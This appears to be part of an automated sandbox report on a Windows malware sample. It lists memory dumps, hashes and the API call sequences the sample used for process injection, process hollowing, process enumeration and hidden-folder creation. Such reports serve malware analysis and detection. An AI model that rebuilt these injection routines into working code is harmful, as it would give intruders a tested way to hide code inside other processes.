              • Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction Fuzzy Hash: BE214030A34C1E0BEB18667C8859764F6D2E79C321F580355ED0DD36D8ED68CC9187C5

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000012.00000002.2434430030.0000000000250000.00000040.00000001.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_250000_smartscreen.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: a145c58afc3974f5706ef822a683dfbe68aba336ccf0c723b2b28b8f7f590290
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 60F05EB2524504AFFB007BB08CCAD7B76ACEE403027840935FC46DA09AED349C388979

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 24 1c0e21-1c0e4f VirtualAllocEx 25 1c0eb7-1c0eba 24->25 26 1c0e51-1c0e6d WriteProcessMemory 24->26 26->25 27 1c0e6f-1c0e74 26->27 28 1c0e76-1c0e84 IsWow64Process 27->28 29 1c0ea1-1c0eb1 CreateRemoteThread 27->29 28->29 30 1c0e86-1c0e9f 28->30 29->25 30->25
              APIs
              • VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
              • WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
              • IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              • CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C0EB1
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction ID: 9e1f878eac78179e63507154ab3e59f021aece4aaf68afa768676749f8b9bd9e
              • Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction Fuzzy Hash: 6A119A32240204FBFF215F21CC85FAA3B69EF84B54F188014FE48BE595D770E560CAA8

              Control-flow Graph

              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 022505DA
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 022505FB
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0225062B
              • NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0225064D
                • Part of subcall function 02250655: NtWriteVirtualMemory.NTDLL(?,?,02250F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0225066F
              Memory Dump Source
              • Source File: 00000013.00000002.2495993363.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_2250000_bin.jbxd
              Similarity
              • API ID: Memory$VirtualWrite$ProcessRead
              • String ID:
              • API String ID: 2369493071-0
              • Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction ID: 972858e1fb8156d71226566be3cc3df0139082a55436f80db0b199c8b59938c8
              • Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
              • Instruction Fuzzy Hash: 2C111BB0390745BBE7209F45CCC4F96B766FF0C300F548124AB085A292CB70B9A4DB99

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 84 1c15e4-1c162a NtCreateUserProcess
              APIs
              • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001C160C
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: CreateProcessUser
              • String ID:
              • API String ID: 2217836671-0
              • Opcode ID: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
              • Instruction ID: f89654c994a3303b23e412f08d7b43ad8504f33b7d29e365df13ca103ac73e30
              • Opcode Fuzzy Hash: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
              • Instruction Fuzzy Hash: F2F05436100109EFCF068F90DA94C9A3B32FF5D358B048159FE1A2A2A0C772A970EB58

              Control-flow Graph

              APIs
              • NtWriteVirtualMemory.NTDLL(?,?,02250F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0225066F
              Memory Dump Source
              • Source File: 00000013.00000002.2495993363.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_2250000_bin.jbxd
              Similarity
              • API ID: MemoryVirtualWrite
              • String ID:
              • API String ID: 3527976591-0
              • Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction ID: e77c15a4de2ec8ee16c58a309ca8558447daf3d4da7b220977cb32847672f043
              • Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction Fuzzy Hash: 5DF0AE74254611AFD328DF84C984B64B7A2FF58310F158499E9898B3A1CB30AA40CB45

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 91 1c16c0-1c16d0 92 1c16f7-1c1705 NtResumeThread 91->92 93 1c16d2-1c16f2 call 1c0e21 91->93 93->92
              APIs
              • NtResumeThread.NTDLL(?,?), ref: 001C16FD
                • Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
                • Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
                • Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$AllocMemoryResumeThreadVirtualWow64Write
              • String ID:
              • API String ID: 308677811-0
              • Opcode ID: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
              • Instruction ID: 50c68c5dfab682ea1a1f8b0f0c987396ec09a66bf25883eb63b730f6d608dfef
              • Opcode Fuzzy Hash: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
              • Instruction Fuzzy Hash: 12E09A75100104BAEF029F54C999F4A3B70AB25358F044455EC09AE1C6C3F59524CB6C

              Control-flow Graph

              APIs
              • Sleep.KERNELBASE(00001388), ref: 001C099A
              • RtlExitUserThread.NTDLL(00000000), ref: 001C09A2
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 001C09C2
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C09DA
                • Part of subcall function 001C0A1A: CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
                • Part of subcall function 001C0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
                • Part of subcall function 001C0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
                • Part of subcall function 001C0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
                • Part of subcall function 001C0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
                • Part of subcall function 001C0A1A: ResumeThread.KERNEL32(?), ref: 001C0AF7
                • Part of subcall function 001C0A1A: Sleep.KERNEL32(000003E8), ref: 001C0B07
                • Part of subcall function 001C0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 482e49ecec93f6808493f0189dbbc3643221c1c1eb3ea815b0c0a648cf82ffd9
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 84413071640214AFEF129F60CC85FA977ACEF54B44F040199BB49FE0D6DB709A90CA65

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C3FFE
              • Sleep.KERNELBASE(000003E8,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C4020
              • Sleep.KERNELBASE(000007D0), ref: 001C4030
              • Sleep.KERNELBASE(00000BB8), ref: 001C4040
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: 90a0306340f54f8a0a8555a1ee633c2a62b65fb2f3a667207fde47de25335585
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: A1F01C7058C280D7EB507BA08C9AF8D36A89F31709F041098BB49AE496CF78C560DE72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 55 1c1386-1c1393 56 1c1399-1c139f 55->56 57 1c1435-1c1436 55->57 56->57 58 1c13a5-1c13bb VirtualProtect 56->58 58->57 59 1c13bd-1c13d0 VirtualAlloc 58->59 59->59 60 1c13d2-1c13d9 59->60 61 1c13dc-1c13ec call 1c0ebd 60->61 64 1c13ee-1c13fc 61->64 65 1c13fe 64->65 66 1c1401-1c142f VirtualProtect 64->66 65->66 66->57
              APIs
              • VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
              • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
              • VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: aee6498fc1534bf5843544c719c366106a18b629b188e7960a7d370974955569
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 5521CD31940256AFDB12DF78C848FACBBB5AF15710F458229F955AF2D1E730E810CB94

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001C1522,00000006,?,00000000), ref: 001C152D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
                • Part of subcall function 001C1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
                • Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$AddressAllocLibraryLoadProc
              • String ID:
              • API String ID: 2821516111-0
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: 84603d99140c77a5ab07f23fff341f14d22a0cbe777f466f71f0401ea30cd6a0
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: 6511C1B2404614AEEF03AF20C5C4DAA73ECFE51708B450A6EAD85EF44EEF709154CAE5

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001C067F,00000009,?,00000000), ref: 001C068D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C06CE: lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
                • Part of subcall function 001C06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
                • Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C070A
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
                • Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
                • Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
                • Part of subcall function 001C06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
                • Part of subcall function 001C06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
                • Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C081D
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 6916e961ec7af8ef0e99d5548a14004a71d42b8846935f748d6844fc744d3216
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: 25411DB2404214DFDB176BA08889FAA73ACEF54B00F4505ADBB85EF056DF309690CEA5

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
              • lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
              • Sleep.KERNEL32(00001388), ref: 001C070A
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
              • Sleep.KERNEL32(00001388), ref: 001C081D
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 7ea33d55d254b196ccdd85eefc5e787c536d3095197ddd6fe78dffc3f5513c5a
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: 6A31FDB2500214DFDB176BA08C89FAA73BCEF54B00F4504ADBB85EE055DF309690CEA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 161 1c2666-1c2674 call 1c375b ExpandEnvironmentStringsA 164 1c2676-1c267e call 1c25e1 161->164 165 1c2680-1c268a 161->165 172 1c26c9-1c26ca 164->172 167 1c268c-1c26ae call 1c26a8 165->167 168 1c26b6-1c26b7 165->168 171 1c26b8-1c26c5 lstrcat 167->171 178 1c26b0 lstrcat 167->178 168->171 174 1c26db-1c26f0 CreateFileA 171->174 175 1c26c7-1c26c8 171->175 176 1c273c-1c273d 174->176 177 1c26f2-1c2709 GetFileSize 174->177 175->172 179 1c270b 177->179 180 1c2730-1c2739 CloseHandle 177->180 178->168 179->180 181 1c270d-1c2710 179->181 180->176 181->180 182 1c2712-1c272a ReadFile 181->182 182->180 183 1c272c-1c272d 182->183 183->180
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(001C2656,00000010,?,?,00000000,00000104), ref: 001C266B
              • lstrcat.KERNEL32(00000000,001C26A3), ref: 001C26B0
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C26C3
              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: e4e2971d9f5b256a87e084e92f98be58b8673f9a9e46d99b317538ee14eb21d4
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 84218B71500218EFEF129F60CC89F9DBBB4EF20704F1441A9ED54EA1A1D730CA619B64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 184 1c0a1a-1c0a29 call 1c375b CreateProcessA 187 1c0b2d call 1c0b34 184->187 188 1c0a2f-1c0a51 GetThreadContext 184->188 191 1c0b32-1c0b33 187->191 188->187 190 1c0a57-1c0a7c VirtualProtectEx 188->190 190->187 192 1c0a82-1c0ac1 DuplicateHandle 190->192 192->187 193 1c0ac3-1c0aef WriteProcessMemory 192->193 193->187 194 1c0af1-1c0afd ResumeThread 193->194 195 1c0b02-1c0b26 Sleep OpenMutexA 194->195 195->191 196 1c0b28-1c0b2b 195->196 196->187 196->195
              APIs
              • CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
              • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
              • ResumeThread.KERNEL32(?), ref: 001C0AF7
              • Sleep.KERNEL32(000003E8), ref: 001C0B07
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: 2067751bc769af6727e3ef1839da84b1b4ae6cc8dc197e2e45a006881c8fd9f5
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: 6E314F716402549FEF238F10CC85FA977B8EF18744F080198AA49FE0E6DB70DA90CE64
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C0D48
              • Sleep.KERNEL32(000003E8), ref: 001C0D5E
              • Process32First.KERNEL32(?,00000000), ref: 001C0D7E
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001C0DB3
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001C0DC9
              • Process32Next.KERNEL32(?,?), ref: 001C0DDF
              • CloseHandle.KERNEL32(?), ref: 001C0E0B
              • Sleep.KERNEL32(000003E8), ref: 001C0E16
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
              • Instruction ID: 724837a767e616bbb3b298c250941228e268248473bfe5bfc93ac98464869d00
              • Opcode Fuzzy Hash: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
              • Instruction Fuzzy Hash: D1217F31911124EBEF225FA4CC54BEDB7B9AF48701F0901E9F90AEA195CB309E908F55
              APIs
              • Sleep.KERNEL32(00000064), ref: 001C2A60
                • Part of subcall function 001C2BBB: Sleep.KERNEL32(00002710), ref: 001C2C2C
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B02
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B46
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B9C
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2BB0
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: 275fb6263abb37eef3e3e71df306651d1210d5ae5ccfddcb04249f26a9e9dd2e
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: 5B310171500269AFEB266F71CC89FAB77BCAFB0704F44049DEA45DA051DF74DA80CAA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction ID: c7485b42a56dfa788a16c5305a251ae6568656de49255e47a5d89b7acae85cb3
              • Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction Fuzzy Hash: 581103B2404554AFEF136B60CD85FAFB7FDEF60305F0544ADE585A6045DB349A80CEA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
              • CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction ID: ac9927580557797ac402c103fd79d00d7d15eeabf0bd26a871240790a05aac25
              • Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction Fuzzy Hash: 7E111FB28045589FEF136B60CC89FAFB7F8EF60305F0144A9E985AA045DB349A80CE91
              Memory Dump Source
              • Source File: 00000013.00000002.2494299651.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
              Similarity
              • API ID: Process$Window$ExitFindLibraryLoadOpenThread
              • String ID:
              • API String ID: 3976292551-0
              • Opcode ID: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
              • Instruction ID: 21096797c2136e07da87d67eb28ce3356d04a0ee0ec389f9400993a79b57079d
              • Opcode Fuzzy Hash: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
              • Instruction Fuzzy Hash: 6111E575944305ABEF026AB08C89FAA375C9F38704F0944AABD55EF096DB70DC41C7B5
              APIs
              • LoadLibraryA.KERNEL32(001C0B61,00000007,?,00000000), ref: 001C0B6D
                • Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA
                • Part of subcall function 001C0BA6: FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
                • Part of subcall function 001C0BA6: GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
                • Part of subcall function 001C0BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
